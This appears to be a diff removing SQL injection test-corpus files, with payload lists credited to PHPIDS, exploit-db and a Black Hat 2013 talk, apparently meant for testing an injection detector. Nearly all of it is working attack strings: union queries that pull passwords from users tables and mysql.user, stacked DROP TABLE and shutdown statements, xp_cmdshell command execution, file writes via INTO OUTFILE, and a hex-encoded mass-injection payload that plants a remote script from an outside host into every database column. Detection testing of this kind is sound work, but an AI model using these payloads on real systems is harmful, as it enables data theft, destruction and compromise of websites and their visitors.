ANY((SELECT 1)) - 1 UNION ALL --
|
||||
1 - ANY(SELECT 1) UNION ALL --
|
||||
|
||||
#
|
||||
# embedded %A0 mysql
|
||||
#
|
||||
1%A0UNION%A0SELECT%A02--
|
||||
1%00UNION%00SELECT%002--
|
||||
|
||||
#
|
||||
# http://www.exploit-db.com/exploits/28854/
|
||||
#
|
||||
stringindatasetchoosen%25' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%25dministrator' and rownum<=1 and PASSWORD like '0%25') and '1%25'='1
|
||||
|
||||
#
|
||||
# Thanks to @rsalgado
|
||||
# A degenerate MySQL ODBC case
|
||||
#
|
||||
-{``.``.id} union select table_name FROM information_schema.tables LIMIT 1
|
|
@ -1,132 +0,0 @@
|
|||
# mysql implicit conversions tests
|
||||
A' AND 'B
|
||||
A 'AND' B
|
||||
'AND'
|
||||
' AND '
|
||||
A' && 'B
|
||||
A '&&' B
|
||||
'&&'
|
||||
' && '
|
||||
A' = 'B
|
||||
A '=' B
|
||||
'='
|
||||
' = '
|
||||
A' & 'B
|
||||
A '&' B
|
||||
'&'
|
||||
' & '
|
||||
A' | 'B
|
||||
A '|' B
|
||||
'|'
|
||||
' | '
|
||||
A' ^ 'B
|
||||
A '^' B
|
||||
'^'
|
||||
' ^ '
|
||||
A' DIV 'B
|
||||
A 'DIV' B
|
||||
'DIV'
|
||||
' DIV '
|
||||
A' / 'B
|
||||
A '/' B
|
||||
'/'
|
||||
' / '
|
||||
A' <=> 'B
|
||||
A '<=>' B
|
||||
'<=>'
|
||||
' <=> '
|
||||
A' >= 'B
|
||||
A '>=' B
|
||||
'>='
|
||||
' >= '
|
||||
A' > 'B
|
||||
A '>' B
|
||||
'>'
|
||||
' > '
|
||||
A' << 'B
|
||||
A '<<' B
|
||||
'<<'
|
||||
' << '
|
||||
A' <= 'B
|
||||
A '<=' B
|
||||
'<='
|
||||
' <= '
|
||||
A' < 'B
|
||||
A '<' B
|
||||
'<'
|
||||
' < '
|
||||
A' LIKE 'B
|
||||
|
||||
# common false positive
|
||||
#A 'LIKE' B
|
||||
#'LIKE'
|
||||
#' LIKE '
|
||||
|
||||
A' - 'B
|
||||
A '-' B
|
||||
'-'
|
||||
' - '
|
||||
A' %25 'B
|
||||
A '%25' B
|
||||
'%25'
|
||||
' %25 '
|
||||
A' MOD 'B
|
||||
A 'MOD' B
|
||||
'MOD'
|
||||
' MOD '
|
||||
A' != 'B
|
||||
A '!=' B
|
||||
'!='
|
||||
' != '
|
||||
A' <> 'B
|
||||
A '<>' B
|
||||
'<>'
|
||||
' <> '
|
||||
A' NOT LIKE 'B
|
||||
A 'NOT LIKE' B
|
||||
'NOT LIKE'
|
||||
' NOT LIKE '
|
||||
A' NOT REGEXP 'B
|
||||
A 'NOT REGEXP' B
|
||||
'NOT REGEXP'
|
||||
' NOT REGEXP '
|
||||
A' OR 'B
|
||||
A 'OR' B
|
||||
'OR'
|
||||
' OR '
|
||||
A' || 'B
|
||||
A '||' B
|
||||
'||'
|
||||
' || '
|
||||
A' %2B 'B
|
||||
A '%2B' B
|
||||
'%2B'
|
||||
' %2B '
|
||||
A' REGEXP 'B
|
||||
A 'REGEXP' B
|
||||
'REGEXP'
|
||||
' REGEXP '
|
||||
A' >> 'B
|
||||
A '>>' B
|
||||
'>>'
|
||||
' >> '
|
||||
A' RLIKE 'B
|
||||
A 'RLIKE' B
|
||||
'RLIKE'
|
||||
' RLIKE '
|
||||
A' NOT RLIKE 'B
|
||||
A 'NOT RLIKE' B
|
||||
'NOT RLIKE'
|
||||
' NOT RLIKE '
|
||||
A' SOUNDS LIKE 'B
|
||||
A 'SOUNDS LIKE' B
|
||||
'SOUNDS LIKE'
|
||||
' SOUNDS LIKE '
|
||||
A' * 'B
|
||||
A '*' B
|
||||
'*'
|
||||
' * '
|
||||
A' XOR 'B
|
||||
A 'XOR' B
|
||||
'XOR'
|
||||
' XOR '
|
|
@ -1,275 +0,0 @@
|
|||
#
|
||||
# Various samples from PHPIDS
|
||||
#
|
||||
%22+OR+1%3D1%23
|
||||
%3B+DROP+table+Users+--
|
||||
admin%27--
|
||||
SELECT+%2F%2A%2132302+1%2F0%2C+%2A%2F+1+FROM+tablename
|
||||
10%3BDROP+members+--
|
||||
SELECT+CHAR%280x66%29
|
||||
SELECT+LOAD_FILE%280x633A5C626F6F742E696E69%29
|
||||
EXEC%28%40stored_proc+%40param%29
|
||||
chr%2811%29%7C%7Cchr%2812%29%7C%7Cchar%2813%29
|
||||
1+or+name+like+%27%25%27
|
||||
1+OR+%271%27%21%3D0
|
||||
1+OR+ASCII%282%29+%3D+ASCII%282%29
|
||||
1%27+OR+1%26%221
|
||||
1%27+OR+%271%27+XOR+%270
|
||||
1+OR%2B1%3D1
|
||||
1+OR%2B%281%29%3D%281%29
|
||||
aaa%27+or+%281%29%3D%281%29+%23%21asd
|
||||
aaa%27+OR+%281%29+IS+NOT+NULL+%23%21asd
|
||||
a%27+or+1%3D%271
|
||||
asd%27+union+%28select+username%2Cpassword+from+admins%29+where+id%3D%271
|
||||
1%27%3B+WAITFOR+TIME+%2717%3A48%3A00+%27+shutdown+--+-a
|
||||
1%27%3B+anything%3A+goto+anything+--+-a
|
||||
%27+%3D%2B+%27
|
||||
asd%27+%3D-+%28-%27asd%27%29+--+-a
|
||||
aa%22in%2B+%28%22aa%22%29+or+-1+%21%3D+%220
|
||||
aa%22+%3D%2B+-+%220++
|
||||
aa%27+LIKE+0+--+-a
|
||||
aa%27+LIKE+md5%281%29+or+%271
|
||||
aa%27+REGEXP-+md5%281%29+or+%271
|
||||
aa%27+DIV%401+%3D+0+or+%271
|
||||
aa%27+XOR-+column+%21%3D+-%270
|
||||
union+select+password+from+users+where+1
|
||||
str%27%3Dversion%28%29%0A%09%09%09%09%09%09UNION%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09SELECT+group_concat%28table_name%29%23%0A%09%09%09%09%09%09%23%23%0A%09%09%09%09%09%09%2F%2A%21FROM%2A%2F+information_schema.tables+WHERE+%271
|
||||
asd%22or-1%3D%22-1
|
||||
asd%22or%211%3D%22%211
|
||||
asd%22or%21%281%29%3D%221
|
||||
asd%22or%401%3D%22%401
|
||||
asd%22or-1+XOR%220
|
||||
asd%22+or+ascii%281%29%3D%2249
|
||||
asd%22+or+md5%281%29%5E%221
|
||||
asd%22+or+table.column%5E%221
|
||||
asd%22+or+%40%40version%5E%220
|
||||
asd%22+or+%40%40global.hot_cache.key_buffer_size%5E%221
|
||||
1%22OR%21%22a
|
||||
1%22OR%21%220
|
||||
1%22OR-%221
|
||||
1%22OR%40%221%22+IS+NULL+%231+%21+%28with+unfiltered+comment+by+tx+%3B%29
|
||||
1%22OR%21%28false%29+%231+%21
|
||||
1%22OR-%28true%29+%23a+%21
|
||||
1%22+INTO+OUTFILE+%22C%3A%2Fwebserver%2Fwww%2Freadme.php
|
||||
asd%27+or+md5%285%29%5E%271+
|
||||
asd%27+or+column%5E%27-1+
|
||||
asd%27+or+true+--+a
|
||||
%5C%22asd%22+or+1%3D%221
|
||||
a+1%27+or+if%28-1%3D-1%2Ctrue%2Cfalse%29%23%21
|
||||
aa%5C%5C%22aaa%27+or+%271
|
||||
%27+or+id%3D+1+having+1+%231+%21
|
||||
%27+or+id%3D+2-1+having+1+%231+%21
|
||||
aa%27or+null+is+null+%23%28
|
||||
aa%27or+current_user%21%3D%27+1
|
||||
aa%27or+BINARY+1%3D+%271
|
||||
aa%27or+LOCALTIME%21%3D%270
|
||||
aa%27like-%27aa
|
||||
aa%27is%5CN%7C%21%27
|
||||
%27is%5CN-%21%27
|
||||
asd%27%7Ccolumn%26%26%271
|
||||
asd%27%7Ccolumn%21%3D%27
|
||||
aa%27or+column%3Dcolumn+--+%23aa
|
||||
aa%27or+column%2Acolumn%21%3D%270
|
||||
aa%27or+column+like+column+--+%23a
|
||||
0%27%2Acolumn+is+%5CN+-+%271
|
||||
1%27%2Acolumn+is+%5CN+or+%271
|
||||
1%27%2A%40a+is+%5CN+-+%27
|
||||
1%27%2A%40a+is+%5CN+or+%271
|
||||
1%27+-1+or%2B1%3D+%27%2B1+
|
||||
1%27+-1+-+column+or+%271+
|
||||
1%27+-1+or+%271
|
||||
+%281%29or%281%29%3D%281%29+
|
||||
fo%22o%27or%271
|
||||
%27+OR+UserID+IS+NOT+2
|
||||
%27+OR+UserID+IS+NOT+NULL
|
||||
%27+OR+UserID+%3E+1
|
||||
%27++OR+UserID+RLIKE++%27.%2B%27+
|
||||
%27OR+UserID+%3C%3E+2
|
||||
1%27+union+%28select+password+from+users%29+--+-a
|
||||
1%27+union+%28select%271%27%2C%272%27%2Cpassword+from+users%29+--+-a
|
||||
1%27+union+all+%28select%271%27%2Cpassword+from+users%29+--+-a
|
||||
aa%27%21%3D%271
|
||||
aa%27%21%3D%7E%271
|
||||
aa%27%3D%28%27aa%27%29%23%28
|
||||
aa%27%7C%2B%271
|
||||
aa%27%7C%21%27aa
|
||||
aa%27%5E%21%27aa+
|
||||
abc%27+%3D+%21%21%270
|
||||
abc%27+%3D+%21%21%21%21%270
|
||||
abc%27+%3D+%21%21%21%21%21%21%21%21%21%21%21%21%21%21%270
|
||||
abc%27+%3D+%210+%3D+%21%21%270
|
||||
abc%27+%3D+%210+%21%3D+%21%21%21%270
|
||||
abc%27+%3D+%21%2B0+%21%3D+%21%270+
|
||||
aa%27%3D%2B%271
|
||||
%27%3Bif+1%3D1+drop+database+test--+-a
|
||||
%27%3Bif+1%3D1+drop+table+users--+-a
|
||||
%27%3Bif+1%3D1+shutdown--+-a
|
||||
%27%3B+while+1%3D1+shutdown--+-a
|
||||
%27%3B+begin+shutdown+end--+-a+
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D+%211+div+1%2B%27
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%211+div+1%2B%27
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%21%40%40version+div+%40%40version%2B%27
|
||||
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D%2B1+%3D+%21true+div+%40%40version%2B%27
|
||||
foo%27div+count%28select%60pass%60from%28users%29where+mid%28pass%2C1%2C1%29rlike+lower%28conv%2810%2Cpi%28%29%2Api%28%29%2Cpi%28%29%2Api%28%29%29%29+%29-%270
|
||||
1-%23canvas%0A++++++++++++++++++++++++%28SELECT+1%2A1+from%28information_schema.tables%29+group+by+table_name+having+-+left%28hex%28table_name%29%2Ctrue%29+%3D+-7%29
|
||||
str%23%27+UNION+SELECT+group_concat%28table_name%29%0A++++++++++++++++++++++++FROM%60information_schema%60.tables
|
||||
aa%27in+%280%29%23%28
|
||||
aa%27%21%3Dascii%281%29%23%28
|
||||
%27+or+SOUNDEX+%281%29+%21%3D+%270
|
||||
aa%27RLIKE+BINARY+0%23%28
|
||||
aa%27or+column%21%3D%271
|
||||
aa%27or+column+DIV+0+%3D0+%23
|
||||
aa%27or+column%2B%281%29%3D%271
|
||||
aa%27or+0%21%3D%270
|
||||
aa%27LIKE%270
|
||||
aa%27or+id+%3D%27%5C%27
|
||||
1%27%3Bdeclare+%40%23+int%3Bshutdown%3Bset+%40%23+%3D+%271
|
||||
1%27%3Bdeclare+%40%40+int%3Bshutdown%3Bset+%40%40+%3D+%271
|
||||
asd%27+or+column%26%26%271
|
||||
asd%27+or+column%3D+%211+and%2B1%3D%271
|
||||
aa%27%21%3Dascii%281%29+or-1%3D-%271
|
||||
a%27IS+NOT+NULL+or%2B1%3D%2B%271
|
||||
aa%27in%28%27aa%27%29+or-1%21%3D%270
|
||||
aa%27+or+column%3D%2B%211+%231
|
||||
aa%27+SOUNDS+like%2B%271
|
||||
aa%27+REGEXP%2B%270
|
||||
aa%27+like%2B%270
|
||||
-1%27%3D-%27%2B1
|
||||
%27%3D%2B%27
|
||||
aa%27+or+stringcolumn%3D+%2B%211+%231+
|
||||
aa%27+or+anycolumn+%5E+-%271
|
||||
aa%27+or+intcolumn+%26%26+%271
|
||||
asd%27+or+column%26%26%271
|
||||
asd%27+or+column%3D+%211+and%2B1%3D%271
|
||||
aa%27+or+column%3D%2B%211+%231
|
||||
aa%27IS+NOT+NULL+or%2B1%5E%2B%270
|
||||
aa%27IS+NOT+NULL+or+%2B1-1+xor%270
|
||||
aa%27IS+NOT+NULL+or%2B2-1-1-1+%21%3D%270
|
||||
aa%27%7C1%2B1%3D%282%29Or%281%29%3D%271
|
||||
aa%27%7C3%21%3D%274
|
||||
aa%27%7Cascii%281%29%2B1%21%3D%271
|
||||
aa%27%7CLOCALTIME%2A0%21%3D%271+
|
||||
asd%27+%7C1+%21%3D+%281%29%23aa
|
||||
%27+is+99999+%3D+%27
|
||||
%27+is+0.00000000000+%3D+%27
|
||||
1%27%2Acolumn-0-%270
|
||||
1%27-%40a+or%271
|
||||
a%27-%40a%3D%40a+or%271
|
||||
aa%27+%2A%40var+or+1+SOUNDS+LIKE+%281%29%7C%271
|
||||
aa%27+%2A%40var+or+1+RLIKE+%281%29%7C%271+
|
||||
a%27+or%7Ecolumn+like+%7E1%7C%271
|
||||
%27%3C%7E%27
|
||||
a%27-1.and+%271
|
||||
aa%27%2F1+DIV+1+or%2B1%3D%2B%271+
|
||||
aa%27%260%2B1%3D%27aa
|
||||
aa%27+like%280%29+%2B+1--+-a+
|
||||
aa%27%5E0%2B0%3D%270
|
||||
aa%27%5E0%2B0%2B1-1%3D%280%29--+-a
|
||||
aa%27%3C3%2B1+or%2B1%3D%2B%271
|
||||
aa%27%251%2B0%3D%270
|
||||
%27%2F1%2F1%3D%27
|
||||
+aa%27%2F1+or+%271
|
||||
+aa1%27+%2A+%40a+or+%271+%27%2F1+regexp+%270
|
||||
+%27+%2F+1+%2F+1+%3D%27
|
||||
+%27%2F1%3D%27
|
||||
+aa%27%260%2B1+%3D+%27aa
|
||||
+aa%27%26%2B1%3D%27aa
|
||||
+aa%27%26%281%29%3D%27aa
|
||||
+aa%27%5E0%2B0+%3D+%270
|
||||
+aa%27%5E0%2B0%2B1-1+%3D+%280%29--+-a
|
||||
+aa%27%5E%2B-3+or%271
|
||||
+aa%27%5E0%21%3D%271
|
||||
+aa%27%5E%280%29%3D%270
|
||||
+aa%27+%3C+%283%29+or+%271
|
||||
+aa%27+%3C%3C3+or%271
|
||||
+aa%27-%2B%211+or+%271
|
||||
+aa%27-%211+like%270
|
||||
+aa%27+%25+1+or+%271
|
||||
+aa%27+%2F+%271%27+%3C+%273
|
||||
+aa%27+%2F+%2B1+%3C+%273
|
||||
+aa%27+-+%2B+%21+2+%21%3D+%2B+-+%271
|
||||
+aa%27+-+%2B+%21+1+or+%271
|
||||
+aa%27+%2F+%2B1+like+%270
|
||||
+%27+%2F+%2B+%281%29+%2F+%2B+%281%29+%3D%27
|
||||
+aa%27+%26+%2B%280%29-%281%29%3D%27aa
|
||||
+aa%27+%5E%2B+-%280%29+%2B+-%280%29+%3D+%270
|
||||
+aa%27+%5E+%2B+-+3+or+%271
|
||||
+aa%27+%5E+%2B0%21%3D%271
|
||||
+aa%27+%3C+%2B3+or+%271
|
||||
+aa%27+%25+%2B1+or+%271
|
||||
aa%27or+column%2A0+like%270
|
||||
aa%27or+column%2A0%3D%270
|
||||
aa%27or+current_date%2A0
|
||||
1%27%2Fcolumn+is+not+null+-+%27+
|
||||
1%27%2Acolumn+is+not+%5CN+-+%27+
|
||||
1%27%5Ecolumn+is+not+null+-+%27+
|
||||
aa%27+is+0+or+%271
|
||||
%27+or+MATCH+username+AGAINST+%28%27%2Badmin+-a%27+IN+BOOLEAN+MODE%29%3B+--+-a
|
||||
%27+or+MATCH+username+AGAINST+%28%27a%2A+-%29+-%2B+%27+IN+BOOLEAN+MODE%29%3B+--+-a
|
||||
1%27%2A%40a+or+%271
|
||||
1%27%2Anull+or+%271
|
||||
1%27%2AUTC_TIME+or+%271
|
||||
1%27%2Anull+is+null+-+%27
|
||||
1%27%2A%40a+is+null+-+%27
|
||||
1%27%2A%40%40version%2A-0%2520%3D%2520%270
|
||||
1%27%2Acurrent_date+rlike%270
|
||||
aa%27%2Fcurrent_date+in+%280%29+--+-a
|
||||
aa%27+%2F+current_date+regexp+%270
|
||||
aa%27+%2F+current_date+%21%3D+%271
|
||||
1%27+or+current_date%2A-0+rlike%271
|
||||
0%27+%2F+current_date+XOR+%271
|
||||
%27or+not+false+%23aa
|
||||
1%27+%2A+id+-+%270
|
||||
1%27+%2Aid-%270
|
||||
asd%27%3B+shutdown%3B+
|
||||
asd%27%3B+select+null%2Cpassword%2Cnull+from+users%3B+
|
||||
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b+where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user+OPEN+tablecursor+
|
||||
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b%0A++++++++++++++++++++++++where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user%0A++++++++++++++++++++++++OPEN+tablecursor+FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+WHILE%28%40a+%21%3D+null%29%0A++++++++++++++++++++++++%40query++%3D+null%2Bnull%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2Bnull%2B+%27+SET+id%3Dnull%2C%40b+%3D+%40payload%27%0A++++++++++++++++++++++++BEGIN+EXEC+sp_executesql+%40query%0A++++++++++++++++++++++++FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+END%0A++++++++++++++++++++++++CLOSE+tablecursor+DEALLOCATE+tablecursor%3B%0A++++++++++++++++++++++++and+some+text%2C+to+get+pass+the+centrifuge%3B+and+some+more+text.
|
||||
%40query++%3D+null%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2B+%27+SET%5B++%27%2Bnull%2B%40b%2B+%27+%5D++%3D+%40payload%27
|
||||
asd%27+union+distinct%28select+null%2Cpassword%2Cnull+from+users%29--a+
|
||||
asd%27+union+distinct+%28+select+null%2Cpassword%2C%28null%29from+user+%29--+a+
|
||||
# double encoded
|
||||
## DECLARE%2520%40S%2520CHAR%284000%29%3BSET%2520%40S%3DCAST%280x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%2520AS%2520CHAR%284000%29%29%3BEXEC%28%40S%29%3B
|
||||
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
|
||||
## asaa%27%3BSELECT%5Basd%5DFROM%5Basd%5D
|
||||
## asd%27%3B+select+%5Bcolumn%5D+from+users+
|
||||
0x31+union+select+%40%40version%2Cusername%2Cpassword+from+users+
|
||||
1+order+by+if%281%3C2+%2Cuname%2Cuid%29+
|
||||
1+order+by+ifnull%28null%2Cuserid%29+
|
||||
2%27+between+1+and+3+or+0x61+like+%27a
|
||||
4%27+MOD+2+like+%270
|
||||
-1%27+%2FID+having+1%3C+1+and+1+like+1%2F%271+
|
||||
2%27+%2F+0x62+or+0+like+binary+%270
|
||||
0%27+between+2-1+and+4-1+or+1+sounds+like+binary+%271+
|
||||
-1%27+union+%28%28select+%28select+user%29%2C%28select+password%29%2C1%2F1+from+mysql.user%29%29+order+by+%271+
|
||||
-1%27+or+substring%28null%2Fnull%2C1%2Fnull%2C1%29+or+%271
|
||||
1%27+and+1+%3D+hex%28null-1+or+1%29+or+1+%2F%27null+
|
||||
AND+CONNECTION_ID%28%29%3DCONNECTION_ID%28%29
|
||||
AND+ISNULL%281%2F0%29
|
||||
MID%28%40%40hostname%2C+1%2C+1%29
|
||||
CHARSET%28CURRENT_USER%28%29%29
|
||||
DATABASE%28%29+LIKE+SCHEMA%28%29
|
||||
COERCIBILITY%28USER%28%29%29
|
||||
1%27+and+0x1abc+like+0x88+or+%270
|
||||
%27-1-0+union+select+%28select+%60table_name%60+from+%60information_schema%60.tables+limit+1%29+and+%271
|
||||
null%27%27null%27+find_in_set%28uname%2C+%27lightos%27+%29+and+%271
|
||||
%28case-1+when+mid%28load_file%280x61616161%29%2C12%2C+1%2F+1%29like+0x61+then+1+else+0+end%29+
|
||||
%27sounds+like%281%29+union%19%28select%191%2Cgroup_concat%28table_name%29%2C3%19from%19information_schema.%60tables%60%29%23%28
|
||||
0%27+%271%27+like+%280%29+and+1+sounds+like+a+or+true%231
|
||||
+0%27rlike%280%29and+1+rlike+%28%40a%29or+true+-+%27+0+
|
||||
2a%27-1%5E+%27+0%27+and+%28select+mid%28user%2C1+%2F1%2C1%2F+1%29from%60mysql%60.user+limit+1%29+rlike+%27r
|
||||
+A%27+sounds+like%28select+case%281%3D1%29when%271%27then%27A%27end%29+and+%271
|
||||
1%27+and+0x31%3D%271+
|
||||
1%27+and+0x05%3D%28select+0-+-mid%28version%28%29%2F-+-1%2C+1%2C1%29+as+%27a%27+from+dual%29+and+%271+
|
||||
%27AND+1.-1LIKE.1+EXEC+xp_cmdshell+%27dir+
|
||||
|
||||
# skipping
|
||||
#SELECT+1%2C2%2C0xEF%60
|
||||
#SELECT+1%2C2%2C3%60abc%60%60
|
||||
|
||||
1%27AND%23%0A++++++++++++++++++++++++0%23%0A++++++++++++++++++++++++UNION%23%0A++++++++++++++++++++++++SELECT%40a%3A%3Dtable_name+FROM%23%0A++++++++++++++++++++++++information_schema.tables+LIMIT+1%23
|
||||
1%27+and+0x43+%3D+%28select+all+mid%28table_name%2C+1%2C1%29as%27a%27from+%60information_schema%60.tables+limit+1%29+and+%271%0A++++++++++++++++++++++++%27AND+1.-1LIKE.1+INSERT+INTO+TMP_DB+EXEC+%22xp_cmdshell%22%27dir
|
||||
1%27+AND+0x35+%3D+%28SELECT+%40phpids%3A%3DMID%28%40%40version+FROM+1+FOR+1%29+FROM+dual%29+and+%271+
|
||||
null%27+or+%40%3A%3D%28select+all+user%27%27+from+mysql+.+user+limit+1%29+union%23%0A++++++++++++++++++++++++%23%0A++++++++++++++++++++++++select+%40%27
|
||||
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+version%28%29%60
|
||||
1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+%28select+%60user%60+from%23%0A++++++++++++++++++++++++%23cc%0A++++++++++++++++++++++++mysql.user+limit+1%29%27
|
|
@ -1,151 +0,0 @@
|
|||
#
|
||||
# from
|
||||
# Roberto Salgado
|
||||
# SQLi Optimization and Obfuscation Techniques
|
||||
# Black Hat USA 2013
|
||||
#
|
||||
|
||||
#
|
||||
# Slide 47 - Optimizing Queries MSSQL
|
||||
# (note: slightly reworked to put in SQLi format)
|
||||
#
|
||||
1 UNION SELECT table_name + ', ' FROM information_schema.tables FOR XML PATH('')
|
||||
|
||||
#
|
||||
# Slide 48 - Optimizing Queries Oracle
|
||||
# (note: slightly reworked to put in SQLi format)
|
||||
#
|
||||
1 UNION SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables
|
||||
|
||||
#
|
||||
# Slide 49 - Optimizing Queries PSQL
|
||||
# (note: slightly reworked to put in SQLi format)
|
||||
#
|
||||
1 UNION SELECT array_to_json(array_agg(tables))::text FROM (SELECT schemaname, relname FROM pg_stat_user_tables) AS tables LIMIT 1
|
||||
|
||||
#
|
||||
# Slide 50 - Optimizing Queries MSSQL
|
||||
#
|
||||
IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
|
||||
|
||||
#
|
||||
# Slide 54 - Optimizing Queries - More Single Liners
|
||||
# (
|
||||
1 OR 1#"OR"'OR''='"="'OR''='
|
||||
|
||||
#
|
||||
# Slide 55
|
||||
#
|
||||
1 OR 1#"OR"'OR''='"="'OR''='
|
||||
|
||||
#
|
||||
# Slide 61
|
||||
#
|
||||
1!=0--+"!="'!='
|
||||
|
||||
#
|
||||
# Slide 64 How to confuse an Admin
|
||||
#
|
||||
1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! !true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-floor(pi()))),0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL 